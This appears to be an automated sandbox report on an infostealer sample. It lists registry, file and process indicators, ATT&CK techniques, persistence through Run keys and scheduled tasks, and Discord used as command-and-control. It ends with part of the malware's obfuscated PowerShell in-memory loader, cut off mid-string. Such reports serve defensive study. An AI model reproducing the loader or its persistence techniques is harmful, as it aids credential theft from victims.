umbral | f01ae2632bb62a8f559472eaa31a863b82a04821dbdf8adbda7dab3db14d41cc

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000\Control Panel\International\Geo\Nation	rootkit.exe
Key value queried	\REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000\Control Panel\International\Geo\Nation	www.DeadSecObbbfuscation.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	www.DeadSecObbbfuscation.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	www.DeadSecObbbfuscation.exe

Executes dropped EXE 5 IoCs

pid	Process
4056	www.DeadSecObbbfuscation.exe
1980	Modify.exe
3580	www.DeadSec0000000000-obfusecator.exe
4900	XClient.exe
3180	XClient.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\www.DeadSec0000000000-obfusecator = "C:\\ProgramData\\www.DeadSec0000000000-obfusecator.exe"	rootkit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe"	www.DeadSecObbbfuscation.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
18	discord.com
19	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	ip-api.com

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\XClient	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1912 set thread context of 2656	1912	powershell.EXE	122

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

pid	Process
2104	wmic.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Modifies data under HKEY_USERS 53 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1720460785"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
1248	schtasks.exe
508	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4724	powershell.exe
4724	powershell.exe
1300	powershell.exe
1300	powershell.exe
3808	powershell.exe
3808	powershell.exe
1912	powershell.EXE
2372	powershell.exe
2372	powershell.exe
1400	powershell.exe
1400	powershell.exe
1912	powershell.EXE
1812	powershell.exe
1812	powershell.exe
3996	powershell.exe
3996	powershell.exe
2728	powershell.exe
2728	powershell.exe
1688	powershell.exe
1688	powershell.exe
3496	powershell.exe
3496	powershell.exe
1912	powershell.EXE
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
1980	Modify.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
1980	Modify.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe
2656	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3488	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4056	www.DeadSecObbbfuscation.exe
Token: SeDebugPrivilege	1980	Modify.exe
Token: SeDebugPrivilege	4724	powershell.exe
Token: SeDebugPrivilege	1300	powershell.exe
Token: SeDebugPrivilege	3808	powershell.exe
Token: SeDebugPrivilege	1912	powershell.EXE
Token: SeDebugPrivilege	2372	powershell.exe
Token: SeDebugPrivilege	1400	powershell.exe
Token: SeDebugPrivilege	1812	powershell.exe
Token: SeIncreaseQuotaPrivilege	5056	wmic.exe
Token: SeSecurityPrivilege	5056	wmic.exe
Token: SeTakeOwnershipPrivilege	5056	wmic.exe
Token: SeLoadDriverPrivilege	5056	wmic.exe
Token: SeSystemProfilePrivilege	5056	wmic.exe
Token: SeSystemtimePrivilege	5056	wmic.exe
Token: SeProfSingleProcessPrivilege	5056	wmic.exe
Token: SeIncBasePriorityPrivilege	5056	wmic.exe
Token: SeCreatePagefilePrivilege	5056	wmic.exe
Token: SeBackupPrivilege	5056	wmic.exe
Token: SeRestorePrivilege	5056	wmic.exe
Token: SeShutdownPrivilege	5056	wmic.exe
Token: SeDebugPrivilege	5056	wmic.exe
Token: SeSystemEnvironmentPrivilege	5056	wmic.exe
Token: SeRemoteShutdownPrivilege	5056	wmic.exe
Token: SeUndockPrivilege	5056	wmic.exe
Token: SeManageVolumePrivilege	5056	wmic.exe
Token: 33	5056	wmic.exe
Token: 34	5056	wmic.exe
Token: 35	5056	wmic.exe
Token: 36	5056	wmic.exe
Token: SeIncreaseQuotaPrivilege	5056	wmic.exe
Token: SeSecurityPrivilege	5056	wmic.exe
Token: SeTakeOwnershipPrivilege	5056	wmic.exe
Token: SeLoadDriverPrivilege	5056	wmic.exe
Token: SeSystemProfilePrivilege	5056	wmic.exe
Token: SeSystemtimePrivilege	5056	wmic.exe
Token: SeProfSingleProcessPrivilege	5056	wmic.exe
Token: SeIncBasePriorityPrivilege	5056	wmic.exe
Token: SeCreatePagefilePrivilege	5056	wmic.exe
Token: SeBackupPrivilege	5056	wmic.exe
Token: SeRestorePrivilege	5056	wmic.exe
Token: SeShutdownPrivilege	5056	wmic.exe
Token: SeDebugPrivilege	5056	wmic.exe
Token: SeSystemEnvironmentPrivilege	5056	wmic.exe
Token: SeRemoteShutdownPrivilege	5056	wmic.exe
Token: SeUndockPrivilege	5056	wmic.exe
Token: SeManageVolumePrivilege	5056	wmic.exe
Token: 33	5056	wmic.exe
Token: 34	5056	wmic.exe
Token: 35	5056	wmic.exe
Token: 36	5056	wmic.exe
Token: SeDebugPrivilege	3996	powershell.exe
Token: SeIncreaseQuotaPrivilege	5084	wmic.exe
Token: SeSecurityPrivilege	5084	wmic.exe
Token: SeTakeOwnershipPrivilege	5084	wmic.exe
Token: SeLoadDriverPrivilege	5084	wmic.exe
Token: SeSystemProfilePrivilege	5084	wmic.exe
Token: SeSystemtimePrivilege	5084	wmic.exe
Token: SeProfSingleProcessPrivilege	5084	wmic.exe
Token: SeIncBasePriorityPrivilege	5084	wmic.exe
Token: SeCreatePagefilePrivilege	5084	wmic.exe
Token: SeBackupPrivilege	5084	wmic.exe
Token: SeRestorePrivilege	5084	wmic.exe
Token: SeShutdownPrivilege	5084	wmic.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
3488	Explorer.EXE
3488	Explorer.EXE

Suspicious use of SendNotifyMessage 31 IoCs

pid	Process
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE
3488	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4376 wrote to memory of 4056	4376	rootkit.exe	86
PID 4376 wrote to memory of 4056	4376	rootkit.exe	86
PID 4376 wrote to memory of 1980	4376	rootkit.exe	87
PID 4376 wrote to memory of 1980	4376	rootkit.exe	87
PID 4376 wrote to memory of 4724	4376	rootkit.exe	88
PID 4376 wrote to memory of 4724	4376	rootkit.exe	88
PID 1980 wrote to memory of 1300	1980	Modify.exe	90
PID 1980 wrote to memory of 1300	1980	Modify.exe	90
PID 4376 wrote to memory of 1248	4376	rootkit.exe	92
PID 4376 wrote to memory of 1248	4376	rootkit.exe	92
PID 4376 wrote to memory of 3580	4376	rootkit.exe	94
PID 4376 wrote to memory of 3580	4376	rootkit.exe	94
PID 4376 wrote to memory of 3580	4376	rootkit.exe	94
PID 1980 wrote to memory of 3808	1980	Modify.exe	95
PID 1980 wrote to memory of 3808	1980	Modify.exe	95
PID 1980 wrote to memory of 2372	1980	Modify.exe	99
PID 1980 wrote to memory of 2372	1980	Modify.exe	99
PID 1980 wrote to memory of 1400	1980	Modify.exe	102
PID 1980 wrote to memory of 1400	1980	Modify.exe	102
PID 4056 wrote to memory of 1812	4056	www.DeadSecObbbfuscation.exe	104
PID 4056 wrote to memory of 1812	4056	www.DeadSecObbbfuscation.exe	104
PID 1980 wrote to memory of 5056	1980	Modify.exe	106
PID 1980 wrote to memory of 5056	1980	Modify.exe	106
PID 4056 wrote to memory of 3996	4056	www.DeadSecObbbfuscation.exe	108
PID 4056 wrote to memory of 3996	4056	www.DeadSecObbbfuscation.exe	108
PID 1980 wrote to memory of 5084	1980	Modify.exe	110
PID 1980 wrote to memory of 5084	1980	Modify.exe	110
PID 4056 wrote to memory of 2728	4056	www.DeadSecObbbfuscation.exe	112
PID 4056 wrote to memory of 2728	4056	www.DeadSecObbbfuscation.exe	112
PID 1980 wrote to memory of 1808	1980	Modify.exe	114
PID 1980 wrote to memory of 1808	1980	Modify.exe	114
PID 1980 wrote to memory of 1688	1980	Modify.exe	116
PID 1980 wrote to memory of 1688	1980	Modify.exe	116
PID 4056 wrote to memory of 3496	4056	www.DeadSecObbbfuscation.exe	118
PID 4056 wrote to memory of 3496	4056	www.DeadSecObbbfuscation.exe	118
PID 1980 wrote to memory of 2104	1980	Modify.exe	120
PID 1980 wrote to memory of 2104	1980	Modify.exe	120
PID 1912 wrote to memory of 2656	1912	powershell.EXE	122
PID 1912 wrote to memory of 2656	1912	powershell.EXE	122
PID 1912 wrote to memory of 2656	1912	powershell.EXE	122
PID 1912 wrote to memory of 2656	1912	powershell.EXE	122
PID 1912 wrote to memory of 2656	1912	powershell.EXE	122
PID 1912 wrote to memory of 2656	1912	powershell.EXE	122
PID 1912 wrote to memory of 2656	1912	powershell.EXE	122
PID 1912 wrote to memory of 2656	1912	powershell.EXE	122
PID 2656 wrote to memory of 616	2656	dllhost.exe	5
PID 2656 wrote to memory of 672	2656	dllhost.exe	7
PID 2656 wrote to memory of 960	2656	dllhost.exe	12
PID 2656 wrote to memory of 384	2656	dllhost.exe	13
PID 2656 wrote to memory of 720	2656	dllhost.exe	14
PID 2656 wrote to memory of 1044	2656	dllhost.exe	16
PID 2656 wrote to memory of 1128	2656	dllhost.exe	17
PID 2656 wrote to memory of 1152	2656	dllhost.exe	18
PID 2656 wrote to memory of 1168	2656	dllhost.exe	19
PID 2656 wrote to memory of 1204	2656	dllhost.exe	20
PID 2656 wrote to memory of 1304	2656	dllhost.exe	21
PID 2656 wrote to memory of 1320	2656	dllhost.exe	22
PID 2656 wrote to memory of 1372	2656	dllhost.exe	23
PID 2656 wrote to memory of 1412	2656	dllhost.exe	24
PID 2656 wrote to memory of 1440	2656	dllhost.exe	25
PID 2656 wrote to memory of 1592	2656	dllhost.exe	26
PID 2656 wrote to memory of 1600	2656	dllhost.exe	27
PID 2656 wrote to memory of 1656	2656	dllhost.exe	28
PID 2656 wrote to memory of 1724	2656	dllhost.exe	29

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:384
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{247bfd2f-a347-44c7-8793-1b197dc51c69}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2656

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:720

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1044

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1128

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1152

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1168

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1204
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2892
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:oaSExpkudVCx{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vKDQJdzZhUHcxb,[Parameter(Position=1)][Type]$wpdQgvzinM)$FNlWDXhLNEf=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+''+'e'+'d'+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+''+'r'+'y'+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+'y'+'p'+'e',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+'P'+'u'+'b'+'l'+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+[Char](65)+'ns'+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+'t'+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s',[MulticastDelegate]);$FNlWDXhLNEf.DefineConstructor(''+[Char](82)+'TS'+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+'l'+'N'+''+[Char](97)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+''+','+'P'+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$vKDQJdzZhUHcxb).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'a'+[Char](103)+''+'e'+'d');$FNlWDXhLNEf.DefineMethod('I'+'n'+''+[Char](118)+'o'+[Char](107)+''+[Char](101)+'','Pu'+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+'Hi'+[Char](100)+''+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+''+'o'